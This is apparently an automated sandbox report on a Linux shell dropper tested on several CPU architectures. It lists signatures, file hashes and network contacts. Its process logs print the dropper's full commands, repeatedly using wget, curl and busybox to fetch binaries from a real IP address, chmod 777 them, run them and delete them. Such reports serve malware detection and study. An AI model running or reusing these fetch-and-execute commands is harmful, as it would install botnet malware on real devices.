Malware Analysis Report

2025-05-06 03:38

Sample ID 241124-bgrctasldj
Target 26f371cd3359d8f6a45ccc544288c804.bin
SHA256 62a4f45e115628fc0a1a715955751f95da641bea81d8b9e50f08b9a5ae16312c
Tags
defense_evasion discovery antivm
score
7/10

Analysis Overview

score
7/10

SHA256

62a4f45e115628fc0a1a715955751f95da641bea81d8b9e50f08b9a5ae16312c

Threat Level: Shows suspicious behavior

The file 26f371cd3359d8f6a45ccc544288c804.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 01:07

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 01:07

Reported

2024-11-24 01:09

Platform

debian9-mipsel-20240611-en

Max time kernel

92s

Max time network

90s

Command Line

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy N/A
N/A /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 N/A
N/A /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat N/A
N/A /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c N/A
N/A /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E N/A
N/A /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y N/A
N/A /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT N/A
N/A /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 N/A
N/A /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB N/A
N/A /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR N/A
N/A /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 N/A
N/A /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey N/A
N/A /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O N/A
N/A /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /usr/bin/curl N/A
File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /usr/bin/curl N/A
File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /usr/bin/curl N/A
File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /usr/bin/curl N/A
File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /usr/bin/curl N/A
File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /usr/bin/curl N/A
File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /usr/bin/curl N/A
File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /usr/bin/curl N/A
File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /usr/bin/curl N/A
File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /usr/bin/curl N/A
File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /usr/bin/curl N/A
File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /usr/bin/curl N/A
File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /usr/bin/curl N/A
File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /usr/bin/curl N/A

Processes

/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/chmod

[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/rm

[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/wget

[wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/chmod

[chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4

[./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/rm

[rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/wget

[wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/chmod

[chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat

[./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/rm

[rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/wget

[wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/chmod

[chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c

[./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/rm

[rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/wget

[wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/chmod

[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E

[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/rm

[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/wget

[wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/chmod

[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y

[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/rm

[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/chmod

[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT

[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/rm

[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/wget

[wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/chmod

[chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0

[./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/rm

[rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/wget

[wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/chmod

[chmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB

[./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/rm

[rm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/wget

[wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/chmod

[chmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR

[./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/rm

[rm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/chmod

[chmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5

[./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/rm

[rm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/chmod

[chmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey

[./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/rm

[rm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/wget

[wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/chmod

[chmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O

[./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/rm

[rm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/wget

[wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/chmod

[chmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5

[./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/rm

[rm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 01:07

Reported

2024-11-24 01:09

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

28s

Max time network

129s

Command Line

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy N/A
N/A /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 N/A
N/A /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat N/A
N/A /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c N/A
N/A /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E N/A
N/A /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y N/A
N/A /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT N/A
N/A /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 N/A
N/A /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB N/A
N/A /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR N/A
N/A /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 N/A
N/A /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey N/A
N/A /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O N/A
N/A /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /usr/bin/curl N/A
File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /usr/bin/curl N/A
File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /usr/bin/curl N/A
File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /usr/bin/curl N/A
File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /usr/bin/curl N/A
File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /usr/bin/curl N/A
File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /usr/bin/curl N/A
File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /usr/bin/curl N/A
File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /usr/bin/curl N/A
File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /usr/bin/curl N/A
File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /usr/bin/curl N/A
File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /usr/bin/curl N/A
File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /usr/bin/curl N/A
File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /usr/bin/curl N/A

Processes

/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/chmod

[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/rm

[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
N/A 224.0.0.251:5353 udp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 89.187.167.3:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 01:07

Reported

2024-11-24 01:10

Platform

debian9-armhf-20240611-en

Max time kernel

16s

Max time network

43s

Command Line

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy N/A
N/A /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 N/A
N/A /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat N/A
N/A /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c N/A
N/A /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E N/A
N/A /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y N/A
N/A /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /usr/bin/curl N/A
File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /usr/bin/curl N/A
File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /usr/bin/curl N/A
File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /usr/bin/curl N/A
File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /usr/bin/curl N/A
File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /usr/bin/curl N/A
File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /usr/bin/curl N/A

Processes

/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/chmod

[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/rm

[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 01:07

Reported

2024-11-24 01:09

Platform

debian9-mipsbe-20240611-en

Max time kernel

94s

Max time network

100s

Command Line

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /usr/bin/curl N/A
File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /usr/bin/curl N/A
File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /usr/bin/curl N/A
File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /usr/bin/curl N/A
File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /usr/bin/curl N/A
File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /usr/bin/curl N/A
File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /usr/bin/curl N/A
File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /usr/bin/curl N/A
File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /usr/bin/curl N/A
File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /usr/bin/curl N/A
File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /usr/bin/curl N/A
File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /usr/bin/curl N/A
File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /usr/bin/curl N/A
File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /usr/bin/curl N/A

Processes

/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/chmod

[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/rm

[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/wget

[wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/chmod

[chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4

[./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

